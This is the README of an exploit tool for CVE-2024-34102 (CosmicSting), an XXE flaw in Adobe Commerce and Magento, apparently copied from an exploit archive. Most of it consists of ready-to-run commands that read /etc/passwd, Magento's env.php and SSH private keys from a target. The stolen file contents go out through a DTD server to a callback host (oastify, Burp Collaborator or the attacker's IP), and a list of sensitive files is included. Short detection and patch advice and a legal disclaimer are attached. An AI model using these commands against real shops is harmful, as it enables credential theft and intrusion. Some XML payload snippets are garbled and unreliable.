## https://sploitus.com/exploit?id=F2161CB5-5A74-52AB-BE49-2ABFFC4269B9
# CVE-2024-34102 - CosmicSting XXE Exploit


Exploit for CVE-2024-34102 (CosmicSting) - XML External Entity (XXE) vulnerability in Adobe Commerce and Magento.
## ๐ About the Vulnerability
**CVE-2024-34102** is a critical XXE (XML External Entity) vulnerability affecting:
- Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier
- Magento Open Source (same versions)
This vulnerability allows an unauthenticated attacker to:
- ๐ Read arbitrary files from the server
- ๐ Exfiltrate credentials and sensitive configurations
- ๐พ Access database information
- ๐จ Execute arbitrary code (in some scenarios)
**CVSS Score:** 9.8 (Critical)
## ๐ฏ Credits
This exploit is based on the original work by:
- **[@Chocapikk](https://github.com/Chocapikk)** - [Original CVE-2024-34102](https://github.com/Chocapikk/CVE-2024-34102)
### Improvements in this version:
- โ Custom dynamic DTD server (avoids fars.ee dependency)
- โ Callback server with automatic decoding
- โ Required parameter validation
- โ Retry logic for external services
- โ More descriptive error messages
- โ HTTPS support for callbacks
- โ Full Python 3.8+ compatibility
## ๐ ๏ธ Requirements
- Python 3.8 or higher
- Access to a server to host DTD files (VPS, Burp Collaborator, etc.)
- Callback service (Burp Collaborator, Oastify, or own server)
## ๐ฆ Installation
```bash
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102
# Install dependencies
pip install -r requirements.txt
```
## ๐ Usage
### Method 1: Using fars.ee (automatic)
```bash
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com
```
### Method 2: Using your own DTD server
**Terminal 1 - DTD Server:**
```bash
sudo python3 server_dtd.py
```
**Terminal 2 - Exploit:**
```bash
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com \
--dtd-server YOUR-IP:8000
```
### Method 3: With your own callback server
**Terminal 1 - DTD Server:**
```bash
sudo python3 server_dtd.py
```
**Terminal 2 - Callback Server (auto-decodes):**
```bash
sudo python3 callback_server.py
```
**Terminal 3 - Exploit:**
```bash
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c YOUR-CALLBACK-IP \
--dtd-server YOUR-DTD-IP:8000
```
## ๐ Parameters
### Required:
- `-u, --url` - Target URL (base domain)
- `-f, --file` - File to read from server (e.g., /etc/passwd)
- `-c, --callback` - Callback server (IP/domain)
### Optional:
- `--dtd-server` - Custom server to host DTD file
- `--https` - Use HTTPS for callback (default: HTTP)
## ๐ฌ Examples
### Read /etc/passwd
```bash
python3 exploit.py \
-u https://vulnerable-site.com \
-f /etc/passwd \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
```
### Read Magento configuration
```bash
python3 exploit.py \
-u https://vulnerable-site.com \
-f /var/www/html/app/etc/env.php \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
```
### Read SSH keys
```bash
python3 exploit.py \
-u https://vulnerable-site.com \
-f /home/ubuntu/.ssh/id_rsa \
-c abc123.burpcollaborator.net \
--dtd-server 192.168.1.100:8000 \
--https
```
## ๐ How It Works
### 1. **Out-of-Band XXE**
The exploit uses Out-of-Band XXE technique to exfiltrate data:
```xml
%sp;
%param1;
]>
&exfil;
```
### 2. **External DTD**
The target server downloads the malicious DTD:
```xml
">
```
### 3. **Exfiltration**
The server processes the XML, reads the file, encodes it in base64 and sends it to the callback:
```
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...
```
### 4. **Decoding**
```bash
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d
```
## ๐ Example Output
```
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http
DTD will be dynamically generated with:
[*] Callback: http://abc123.oastify.com
[*] File: /etc/passwd
DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...
=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=
To decode the exfiltrated data:
[*] echo 'BASE64_STRING' | base64 -d
[!] Check your Burp Collaborator or Oastify dashboard now!
```
## ๐ก๏ธ Detection and Mitigation
### For Defenders:
**Detection:**
- Monitor HTTP requests to `/rest/V1/guest-carts/*/estimate-shipping-methods` endpoints
- Alert on XML payloads with external entities (`<!ENTITY`)
- Detect outbound connections to suspicious domains
**Mitigation:**
- Update to patched versions:
- Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9
- Disable external entity processing in XML parser
- Implement WAF with anti-XXE rules
### For Pentesters:
**Interesting files to test:**
```
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ
```
## โ๏ธ Legal Disclaimer
```
This exploit is provided for educational and security research purposes only.
Using this code to test systems without explicit authorization is ILLEGAL.
You are SOLELY responsible for your actions. Use only on:
โ Your own test environments
โ Authorized bug bounty programs
โ Contracted penetration tests
DO NOT use on:
โ Systems without authorization
โ Production environments without permission
โ Any malicious activity
The author is not responsible for misuse of this code.
```
## ๐ References
- [Adobe Security Bulletin APSB24-40](https://helpx.adobe.com/security/products/magento/apsb24-40.html)
- [CVE-2024-34102 Details](https://nvd.nist.gov/vuln/detail/CVE-2024-34102)
- [OWASP XXE Prevention](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
- [Original Exploit by Chocapikk](https://github.com/Chocapikk/CVE-2024-34102)
---
**โญ If this project was useful, please consider giving it a star!**